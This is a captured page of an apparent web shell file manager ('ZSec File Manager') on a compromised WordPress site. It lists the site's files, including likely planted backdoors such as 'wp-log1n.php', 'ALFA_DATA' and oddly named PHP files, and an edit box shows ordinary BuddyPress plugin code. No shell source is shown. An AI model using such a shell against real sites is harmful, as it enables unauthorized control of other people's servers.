ZSec File Manager
Upload
Current Directory: /home/aiessinternational.com/public_html
[Up]
..
[Open]
Hapus
Rename
.htaccess
[Edit]
Hapus
Rename
21cbfe
[Open]
Hapus
Rename
ALFA_DATA
[Open]
Hapus
Rename
advance
[Open]
Hapus
Rename
advance.zip
[Edit]
Hapus
Rename
ammika.php
[Edit]
Hapus
Rename
c8aa5
[Open]
Hapus
Rename
click.php
[Edit]
Hapus
Rename
defaults.php
[Edit]
Hapus
Rename
google41b982abb0d9ca3b.html
[Edit]
Hapus
Rename
index.php
[Edit]
Hapus
Rename
index.php0
[Edit]
Hapus
Rename
item.php
[Edit]
Hapus
Rename
license.txt
[Edit]
Hapus
Rename
mah.php
[Edit]
Hapus
Rename
networks.php
[Edit]
Hapus
Rename
options.php
[Edit]
Hapus
Rename
plugins.php
[Edit]
Hapus
Rename
product.php
[Edit]
Hapus
Rename
readme.html
[Edit]
Hapus
Rename
robots.txt
[Edit]
Hapus
Rename
saiga.php
[Edit]
Hapus
Rename
search.php
[Edit]
Hapus
Rename
web.config
[Edit]
Hapus
Rename
wp-activate.php
[Edit]
Hapus
Rename
wp-admin
[Open]
Hapus
Rename
wp-blog-header.php
[Edit]
Hapus
Rename
wp-comments-post.php
[Edit]
Hapus
Rename
wp-config-sample.php
[Edit]
Hapus
Rename
wp-config.php
[Edit]
Hapus
Rename
wp-content
[Open]
Hapus
Rename
wp-cron.php
[Edit]
Hapus
Rename
wp-includes
[Open]
Hapus
Rename
wp-links-opml.php
[Edit]
Hapus
Rename
wp-load.php
[Edit]
Hapus
Rename
wp-log1n.php
[Edit]
Hapus
Rename
wp-mail.php
[Edit]
Hapus
Rename
wp-settings.php
[Edit]
Hapus
Rename
wp-signup.php
[Edit]
Hapus
Rename
wp-trackback.php
[Edit]
Hapus
Rename
wp.php
[Edit]
Hapus
Rename
xmlrpc.php
[Edit]
Hapus
Rename
Edit File
<?php /** * The BuddyPress Plugin. * * BuddyPress is social networking software with a twist from the creators of WordPress. * * @package BuddyPress * @subpackage Main * @since 1.0.0 */ /** * Plugin Name: BuddyPress * Plugin URI: https://buddypress.org * Description: BuddyPress adds community features to WordPress. Member Profiles, Activity Streams, Direct Messaging, Notifications, and more! * Author: The BuddyPress Community * Author URI: https://buddypress.org * License: GNU General Public License v2 or later * License URI: https://www.gnu.org/licenses/gpl-2.0.html * Text Domain: buddypress * Domain Path: /bp-languages/ * Requires PHP: 5.6 * Requires at least: 6.1 * Version: 14.3.4 */ /** * This files should always remain compatible with the minimum version of * PHP supported by WordPress. */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; // Required PHP version. define( 'BP_REQUIRED_PHP_VERSION', '5.6.0' ); /** * The main function responsible for returning the one true BuddyPress Instance to functions everywhere. * * Use this function like you would a global variable, except without needing * to declare the global. * * Example: <?php $bp = buddypress(); ?> * * @return BuddyPress|null The one true BuddyPress Instance. */ function buddypress() { return BuddyPress::instance(); } /** * Adds an admin notice to installations that don't meet BP's minimum PHP requirement. * * @since 2.8.0 */ function bp_php_requirements_notice() { if ( ! current_user_can( 'update_core' ) ) { return; } ?> <div id="message" class="error notice is-dismissible"> <p><strong><?php esc_html_e( 'Your site does not support BuddyPress.', 'buddypress' ); ?></strong></p> <?php /* translators: 1: current PHP version, 2: required PHP version */ ?> <p><?php printf( esc_html__( 'Your site is currently running PHP version %1$s, while BuddyPress requires version %2$s or greater.', 'buddypress' ), esc_html( phpversion() ), esc_html( BP_REQUIRED_PHP_VERSION ) ); ?> <?php printf( esc_html__( 'See <a href="%s">the Codex guide</a> for more information.', 'buddypress' ), 'https://codex.buddypress.org/getting-started/buddypress-2-8-will-require-php-5-3/' ); ?></p> <p><?php esc_html_e( 'Please update your server or deactivate BuddyPress.', 'buddypress' ); ?></p> </div> <?php } if ( version_compare( phpversion(), BP_REQUIRED_PHP_VERSION, '<' ) ) { add_action( 'admin_notices', 'bp_php_requirements_notice' ); add_action( 'network_admin_notices', 'bp_php_requirements_notice' ); return; } else { require dirname( __FILE__ ) . '/class-buddypress.php'; /* * Hook BuddyPress early onto the 'plugins_loaded' action. * * This gives all other plugins the chance to load before BuddyPress, * to get their actions, filters, and overrides setup without * BuddyPress being in the way. */ if ( defined( 'BUDDYPRESS_LATE_LOAD' ) ) { add_action( 'plugins_loaded', 'buddypress', (int) BUDDYPRESS_LATE_LOAD ); // "And now here's something we hope you'll really like!". } else { $GLOBALS['bp'] = buddypress(); } }
Simpan